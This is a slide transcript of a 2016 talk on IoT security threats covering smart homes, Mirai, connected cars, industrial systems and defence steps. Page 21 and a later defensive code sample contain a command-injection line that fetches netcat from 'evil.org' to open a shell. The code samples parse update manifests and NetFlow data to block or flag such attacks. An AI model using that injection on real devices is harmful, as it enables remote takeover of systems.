The Internet of Threats - Sage Data Security, LLC


Transcript of The Internet of Threats - Sage Data Security, LLC

Page 1: The Internet of Threats - Sage Data Security, LLC

The Internet of Threats

BILLIONS OF WAYS THE IOT POSES AN INFOSEC CHALLENGE

Chris Poulin

CyberCrime 2016 Symposium: Cyber Convergence

IoT Researcher, Futurist

Page 2:

Maker

Breaker

Threat intel

Data geek

Provocateur

TV & movies

The easiest way to hack an Airbus A319

Page 3:

Some questions to establish context

What is your role wrt the IoT?

• Personal consumer of the IoT

• Enterprise manager of IT systems

• A maker of IoT devices

What is your biggest concern with the IoT?

• Safety (e.g., HVAC systems gone wild)

• Data privacy

• Infrastructure security (e.g., IT comingling with IoT)

• New enterprise attack vectors (e.g., end users with wearables)

Page 4:

Page 5:

Page 6:

Smart Home Device Examples: Home Security

Security control and alarm panels

Smart door locks

Smart garage doors

Motion detectors

Window and door contacts

Security cameras

Smart doorbells

Page 7:

Smart Fridge

Smart Lighting

Smart Dishwasher

Smart Oven

Smart Television

Smart Utensils

Smart Wine

Smart Faucet

Page 8:

Smart Home Device Examples: Appliances, Lighting, Entertainment

Appliances

• Refrigerators and cooktops

• Beds

• Autonomous vacuums

Lighting

• Light bulbs (plain white and color changing)

• Pathway lighting

• Indoor and outdoor

Entertainment

• Smart televisions and DVRs

• Audio systems

Page 9:

Smart Home Device Examples: Environment & Safety

Smart thermostats

Smoke / CO detectors

Smart blinds

Water leak detectors

Smart air conditioners

Baby monitors

Page 10:

Smart homes are vulnerable

Your WiFi password is “fluffy123”

“Buy V!gar4”

Page 11:

Why does home automation matter to enterprise IT security?

Mirai malware infected devices

Krebs: 620-650 Gbps

OVH: ~1 Tbps

Dyn: Amazon, PayPal, Box, Slack, Twitter, GitHub, Netflix, Airbnb, Pinterest, Quora, Spotify, Yelp, Second Life, WWE Network

Page 12:

Smart Elevators

Smart Lighting

Smart Doors

Concrete Monitors

Page 13:

IIoT Device Examples: Building Automation

Electric & water

HVAC

Security systems

Lighting

Elevators and escalators

Polarized windows

Earthquake absorbers

Concrete mixing & curing

Page 14:

Page 15:

Page 16:

And they will be connected to your IT networks

IT Network

BAS Network

Page 17:

Connected Cars

Connected Infrastructure

Page 18:

IIoT Device Examples: Smart Cities & Municipalities

Utilities

Lighting

Traffic flow

Trash

Air quality

Violence detection

Page 19:

Connected vehicle threat surface

Engine Control Unit

Transmission Control Unit

Airbag Control Unit

Anti-lock Braking System

Tire Pressure Monitor

Vehicle to Vehicle / Vehicle to Infrastructure Communications

Instrument Cluster / Telematics

Keyless Entry / Anti-theft

OBD-II

Car Multimedia

Dynamic Stability Control

DSRC RF RF channel

Bluetooth, WiFi, media players

OnStar, Uconnect, etc.

Direct connection RF channel

Page 20:

IVIs are messy

Linux / Tizen / QNX

Audio module (open source?)

Video module (open source?)

Apple CarPlay module

Google Android module

Microsoft Sync module

GPS module

Telematics

Voice module (open source?)

Update feature

WiFi module

Page 21:

…so let’s break one

Port 6667/TCP

V850

SPI

CAN bus

updates.txt somepkg ‘; wget http://evil.org/nc; nc …
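The slide's updates.txt line shows the classic failure: a package name read from an update file is spliced into a shell command, so a quote and a semicolon turn an install into arbitrary execution. As an added example (not code from the talk or from any vehicle vendor), here is the defensive counterpart: the manifest parser validates the package name and version against a strict allowlist and builds an argv list for the installer instead of a shell string, so a manifest line carrying shell metacharacters is reported and never run. The manifest layout, the regexes and the /usr/bin/pkg-install path are assumptions.

```python
import re
import shlex

# Hypothetical manifest format (an assumption, not the IVI's real format):
# one package name per line, optionally followed by a version.
# Constructed sample: two benign entries and one entry carrying the kind of
# shell metacharacters shown in the talk's updates.txt example.
SAMPLE_MANIFEST = """\
mediaplayer 2.1.4
somepkg '; wget http://evil.org/nc; nc
bt-stack
"""

# Strict allowlists: no spaces, quotes, semicolons or other separators.
# Anything outside the pattern is rejected outright, never escaped.
PKG_RE = re.compile(r"^[a-z0-9][a-z0-9._-]{0,63}$")
VER_RE = re.compile(r"^[0-9]+(\.[0-9]+){0,3}$")

def parse_manifest(text):
    """Return (accepted, rejected): accepted is a list of (name, version)
    tuples, rejected is the list of raw lines that failed validation."""
    accepted, rejected = [], []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 1)          # name, then optional version
        name = parts[0]
        version = parts[1].strip() if len(parts) > 1 else ""
        if PKG_RE.match(name) and (not version or VER_RE.match(version)):
            accepted.append((name, version))
        else:
            rejected.append(line)
    return accepted, rejected

def build_install_argv(name, version, tool="/usr/bin/pkg-install"):
    """Build an argv list for the (hypothetical) installer. Passed to
    subprocess.run with shell=False, each element is exactly one argument,
    so a name containing '; wget ...' could never become a second command."""
    argv = [tool, "install", name]
    if version:
        argv += ["--version", version]
    return argv

def plan_updates(text):
    """Parse the manifest and return (argv lists to run, rejected lines)."""
    accepted, rejected = parse_manifest(text)
    return [build_install_argv(n, v) for n, v in accepted], rejected

if __name__ == "__main__":
    plans, bad = plan_updates(SAMPLE_MANIFEST)
    for argv in plans:
        print("would run:", shlex.join(argv))   # subprocess.run(argv) in production
    for line in bad:
        print("rejected manifest line:", line)
```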

Page 22:

Number of latent vulnerabilities in a modern luxury vehicle

Using the Linux kernel as a comparative model (as of 10 Oct 2016)

15M lines of code in Linux Kernel

1,507 reported vulnerabilities

1 vulnerability in every 9,954 lines of code

Source: http://www.cvedetails.com/vulnerability-list/vendor_id-33/product_id-47/Linux-Linux-Kernel.html

~10,000 latent vulnerabilities

Page 23:

The perfect storm of resources & tools

eBay, SparkFun, etc.

http://www.ioactive.com/pdfs/IOActive_Adventures_in_Automotive_Networks_and_Control_Units.pdf

http://illmatics.com/car_hacking_poories.pdf

http://marco.guardigli.it/2010/10/hacking-your-car.html

http://opengarages.org/handbook/

Build your own vehicle hacking lab & test cart

Protocol decodes available

Page 24:

IIoT Device Examples: Heavy Industries

Manufacturing:

• Pumps

• Conveyors

• Robots

Energy & Utilities:

• Smart meters

• Transformers

• Pumps

• Dam gates

Page 25:

Industrial IoT incidents

German steel mill

Stuxnet

Page 26:

Agricultural vulnerabilities

Planters: seed depth

Sprayers: dosage manipulation

Silos: manipulate environment

Livestock: feeding, drug, and environmental systems manipulation

Milk: manipulate pasteurization and pH balance systems

Hydroponics: manipulate environment

Irrigation: manipulate control and data

Seeds: manipulate environment

Slaughter: remote control—effect? Who knows…

Processing: manipulate waste system (reverse?)

Page 27:

IIoT Device Examples: Consumer Services

Healthcare

• X-ray machines

• Chemistry analyzers

• Pacemakers, insulin pumps

Retail

• Inventory tracking

• Stocking & picking

• Shipping

Page 28:

Healthcare: hacking a telesurgery unit

Page 29:

Wearable device examples

Apple Watch

Android Wear

Google Glass

Fitness Trackers

Pacemakers

Insulin pumps

Subcutaneous vitals monitor

Page 30:

Wearables security

Fitbit Bluetooth

Sync to PC

Malware: PC pwned!

Page 31:

Page 32:

Page 33:

Be Winston Wolfe. Solve problems.

“You’ve got a corpse in the car, minus a head. Take me to it.”

Page 34:

The layers of the IoT

Traditional IT Services & Security

Page 35:

IoT defense for IT security professionals (1 of 4)

1. Conduct an asset inventory

• Focus on critical assets and sensitive data

• NetFlow to passively identify assets

• VA scans to actively identify assets and add context

• RF scanning

• GQRX

• Scripting skilllz

Page 36:

IoT defense for IT security professionals (2 of 4)

2. Segment systems based on risk

• Enclave firewalls

• Software defined networks

3. Monitor & defend IoT devices on the network

• IDS / IPS

• NetFlow—look for anomalies

• Map relationships of wearables to mobile to users

Page 37:

IoT defense for IT security professionals (3 of 4)

4. Protect IT endpoints

• Endpoint protection software

• VA scanning / patching

• Phishing exercises

5. Collect logs and events from IoT devices

• Log management / SIEM

Page 38:

IoT defense for IT security professionals (4 of 4)

6. Update security policies to include IoT devices

7. Familiarize yourself with non-IT connected devices
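Steps 1 and 3 both lean on NetFlow: passively inventory what is on the network, then look for anomalies. As an added example (not code from the talk), here is the two functions a SOC would start with, run over constructed flow records: a passive inventory of internal hosts and the services they use, and an egress check that flags the Mirai-style behaviour the Krebs/OVH/Dyn slide describes, telnet fan-out to many external hosts followed by a flood. The 10.20.0.0/16 range, the flow tuple layout and the thresholds are assumptions to be tuned per site.

```python
from collections import defaultdict
from ipaddress import ip_address, ip_network

# Constructed NetFlow-style records (not real data), one per flow:
# (src_ip, dst_ip, dst_port, proto, bytes). Internal range is an assumption.
INTERNAL = ip_network("10.20.0.0/16")
SAMPLE_FLOWS = [
    ("10.20.1.10", "10.20.0.5", 443, "tcp", 18000),      # workstation -> intranet
    ("10.20.1.10", "52.0.0.8", 443, "tcp", 240000),      # workstation -> SaaS
    ("10.20.7.21", "10.20.0.9", 123, "udp", 300),        # thermostat -> NTP
    ("10.20.7.21", "203.0.113.40", 8883, "tcp", 4000),   # thermostat -> vendor MQTT
    ("10.20.7.33", "198.51.100.7", 23, "tcp", 120),      # camera probing telnet...
    ("10.20.7.33", "198.51.100.8", 23, "tcp", 120),
    ("10.20.7.33", "198.51.100.9", 2323, "tcp", 120),
    ("10.20.7.33", "198.51.100.10", 23, "tcp", 120),
    ("10.20.7.33", "203.0.113.9", 80, "tcp", 9000000),   # ...then flooding a host
]
SCAN_PORTS = {23, 2323}    # telnet ports Mirai-era bots probed
SCAN_FANOUT = 4            # distinct external hosts on those ports
FLOOD_BYTES = 5000000      # outbound bytes to a single external host

def inventory(flows):
    """Passive inventory: each internal source with the (port, proto)
    services it talks to. Nothing is sent; only flow records are read."""
    assets = defaultdict(set)
    for src, _, dport, proto, _ in flows:
        if ip_address(src) in INTERNAL:
            assets[src].add((dport, proto))
    return dict(assets)

def anomalies(flows):
    """Flag internal hosts whose egress looks like a compromised IoT device:
    telnet fan-out across many external hosts, or a volume flood."""
    fanout, egress = defaultdict(set), defaultdict(int)
    for src, dst, dport, _, nbytes in flows:
        if ip_address(src) not in INTERNAL or ip_address(dst) in INTERNAL:
            continue                      # only internal -> external flows
        if dport in SCAN_PORTS:
            fanout[src].add(dst)
        egress[(src, dst)] += nbytes
    findings = [(s, "telnet-fanout", len(h)) for s, h in fanout.items()
                if len(h) >= SCAN_FANOUT]
    findings += [(s, "egress-flood", n) for (s, d), n in egress.items()
                 if n >= FLOOD_BYTES]
    return sorted(findings)

if __name__ == "__main__":
    for host, svc in sorted(inventory(SAMPLE_FLOWS).items()):
        print(host, sorted(svc))
    for finding in anomalies(SAMPLE_FLOWS):
        print("ALERT", finding)
```

The inventory output is the list to reconcile against the asset register; the alerts are the cases where a step 2 enclave firewall should already have stopped the traffic.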

Page 39:

Resources for makers

https://www.owasp.org/index.php/OWASP_Internet_of_Things_Project

http://builditsecure.ly/

https://www.iamthecavalry.org/

Page 40: